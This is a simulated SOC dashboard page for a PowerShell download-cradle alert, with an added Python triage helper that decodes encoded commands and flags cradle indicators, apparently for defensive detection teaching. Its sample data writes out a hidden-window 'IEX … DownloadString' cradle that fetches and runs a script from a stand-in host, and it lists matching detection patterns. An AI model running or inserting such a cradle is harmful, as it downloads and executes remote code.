Interactive Demo — Simulated data only.
SOC365 Dashboard
Acme Legal Services Ltd · Live · 15:24:42 UTC

Suspicious PowerShell Execution

High · Escalated
ALR-00336 · 2026-04-08T12:01:14Z

Description

An encoded PowerShell command was executed on SRV-APP-01 by user 'p.thomas'. The command attempts to download and execute a remote payload. Flagged by Firewall.

Alert Metadata

Alert ID
ALR-00336
Timestamp
2026-04-08T12:01:14Z
Severity
High
Status
Escalated
Detection Source
Firewall
Assigned Analyst
Marcus Webb

Endpoint Information

Hostname
SRV-APP-01
User Account
p.thomas
Source IP
103.195.216.119
Destination IP
10.0.181.173
Origin Country
China (CN)

MITRE ATT&CK Mapping

Tactic
Execution
Technique
T1059.001 · Command and Scripting Interpreter: PowerShell
Reference
https://attack.mitre.org/techniques/T1059/001/
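The description and the T1059.001 mapping above name an encoded PowerShell download cradle but show no triage logic. Below is an added example, not SOC365 or EmilyAI code, of how an analyst or a SIEM rule could decode such a command line and decide whether the alert warrants escalation. The ProcessEvent shape, the indicator list and every sample command line are constructed for this example. One caveat for this alert: a firewall only sees the outbound fetch, so the command line itself has to come from a process-creation source such as Sysmon Event ID 1 or Windows Security Event 4688 with command-line auditing enabled.

```python
"""Triage helper for 'Suspicious PowerShell Execution' alerts (T1059.001).

Added example, not SOC365 or EmilyAI code. It takes process-creation
records as a SIEM might export them, decodes any -EncodedCommand payload
and looks for download-and-execute cradles. The record shape, indicator
list and all sample command lines are constructed for this example.
"""
import base64
import binascii
import re
from dataclasses import dataclass
from typing import List, Optional

# powershell.exe accepts -e, -ec, -en, -enc, -encoded, -EncodedCommand
# (any unambiguous prefix), with '-' or '/' as the switch character.
ENCODED_FLAG = re.compile(r"(?i)(?:^|\s)[-/](?:e|ec|en|enc\w*)\s+([A-Za-z0-9+/=]{8,})")

# (pattern, label, stage). Checked against the outer command line (with the
# base64 blob removed) and against the decoded script.
INDICATORS = [
    (r"(?i)Net\.WebClient", "System.Net.WebClient object", "download"),
    (r"(?i)\.Download(?:String|File|Data)\s*\(", "WebClient.Download* call", "download"),
    (r"(?i)Invoke-WebRequest|Invoke-RestMethod|\b(?:iwr|irm|wget|curl)\b", "Invoke-WebRequest or alias", "download"),
    (r"(?i)Invoke-Expression|\biex\b", "Invoke-Expression on fetched text", "execute"),
    (r"(?i)Start-Process|\bsaps\b", "Start-Process", "execute"),
    (r"(?i)-w(?:indowstyle)?\s+hidden", "hidden window", "evasion"),
    (r"(?i)-nop\b|-noprofile\b", "profile bypass", "evasion"),
    (r"(?i)-e(?:p|xecutionpolicy)\s+bypass", "execution policy bypass", "evasion"),
]


@dataclass
class ProcessEvent:
    host: str
    user: str
    parent_image: str
    command_line: str


@dataclass
class Finding:
    host: str
    user: str
    encoded: bool
    decoded_script: Optional[str]
    indicators: List[str]
    verdict: str                      # 'escalate', 'review' or 'low'
    technique: str = "T1059.001"      # Command and Scripting Interpreter: PowerShell


def encode_command(script: str) -> str:
    """Base64 as powershell.exe -EncodedCommand expects it: UTF-16LE, no BOM."""
    return base64.b64encode(script.encode("utf-16-le")).decode("ascii")


def decode_encoded_command(command_line: str) -> Optional[str]:
    """Return the decoded script if the command line carries an encoded command."""
    m = ENCODED_FLAG.search(command_line)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1), validate=True).decode("utf-16-le")
    except (binascii.Error, UnicodeDecodeError):
        return None  # malformed blob: report 'not decodable' rather than guess


def triage(event: ProcessEvent) -> Finding:
    """Decode, scan both layers for cradle indicators, and return a verdict."""
    encoded = ENCODED_FLAG.search(event.command_line) is not None
    decoded = decode_encoded_command(event.command_line)
    # Drop the base64 blob so indicator regexes never match inside it.
    outer = ENCODED_FLAG.sub(" -EncodedCommand <blob>", event.command_line)
    haystack = outer + "\n" + (decoded or "")
    hits: List[str] = []
    stages = set()
    for pattern, label, stage in INDICATORS:
        if re.search(pattern, haystack):
            hits.append(label)
            stages.add(stage)
    if {"download", "execute"} <= stages:
        verdict = "escalate"   # full cradle: fetch remote content and run it
    elif stages & {"download", "execute"} or (encoded and (decoded is None or "evasion" in stages)):
        verdict = "review"     # half a cradle, undecodable blob, or encoded plus evasion flags
    else:
        verdict = "low"        # encoding alone is common in legitimate automation
    return Finding(event.host, event.user, encoded, decoded, hits, verdict)


# Constructed sample records. 203.0.113.10 is a documentation (TEST-NET-3) address.
SAMPLE_EVENTS = [
    ProcessEvent("SRV-APP-01", "p.thomas", "w3wp.exe",
                 "powershell.exe -nop -w hidden -enc " + encode_command(
                     "IEX (New-Object Net.WebClient).DownloadString('http://203.0.113.10/a.ps1')")),
    ProcessEvent("SRV-MAIL-01", "svc_backup", "cmd.exe",
                 "powershell.exe -enc " + encode_command(
                     "Invoke-WebRequest -Uri https://updates.example/agent.msi -OutFile C:\\Temp\\agent.msi")),
    ProcessEvent("WS-LAP-012", "j.doe", "explorer.exe",
                 "powershell.exe -enc " + encode_command(
                     "Get-Service | Where-Object Status -eq 'Running'")),
    ProcessEvent("WS-LAP-012", "j.doe", "explorer.exe",
                 "powershell.exe -ExecutionPolicy Bypass -File C:\\Scripts\\inventory.ps1"),
]


def triage_all(events: List[ProcessEvent] = SAMPLE_EVENTS) -> List[Finding]:
    return [triage(e) for e in events]


if __name__ == "__main__":
    for f in triage_all():
        print(f"{f.host:<11} {f.user:<11} encoded={str(f.encoded):<5} "
              f"{f.verdict:<8} {'; '.join(f.indicators) or '-'}")
```

Run stand-alone it prints one line per record: the SRV-APP-01 event (matching the alert above) is the only one that reaches 'escalate', because both the download stage and the execute stage are present in the decoded script; the SRV-MAIL-01 download without execution lands on 'review', and the two WS-LAP-012 events, an encoded but harmless query and an unencoded script with a policy bypass, stay 'low'. Evasion flags on their own are deliberately not enough to escalate, which is what keeps administrative automation out of the queue.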

Investigation Timeline

12:01:14 Event ingested by SOC365 Engine
12:01:18 EmilyAI triage started — correlation enrichment
12:01:19 EmilyAI confidence: 89% — escalated to human analyst
12:01:59 Alert assigned to analyst: Marcus Webb
12:04:05 Investigation started — querying SIEM and threat intelligence
12:06:54 Containment action taken — endpoint isolated
12:20:14 Alert resolved — remediation complete

Related Alerts

ID · Time · Alert · Severity · Status · Host
ALR-00211 · 16h ago · Unauthorised USB Device · Low · False Positive · SRV-APP-01
ALR-00377 · 17h ago · Suspicious PowerShell Execution · Informational · Open · SRV-MAIL-01
ALR-00049 · 17h ago · Suspicious PowerShell Execution · Medium · False Positive · WS-LAP-012
ALR-00136 · 19h ago · Suspicious PowerShell Execution · Low · False Positive · WS-LAP-012
ALR-00495 · 23h ago · Privilege Escalation Attempt · Low · Escalated · SRV-APP-01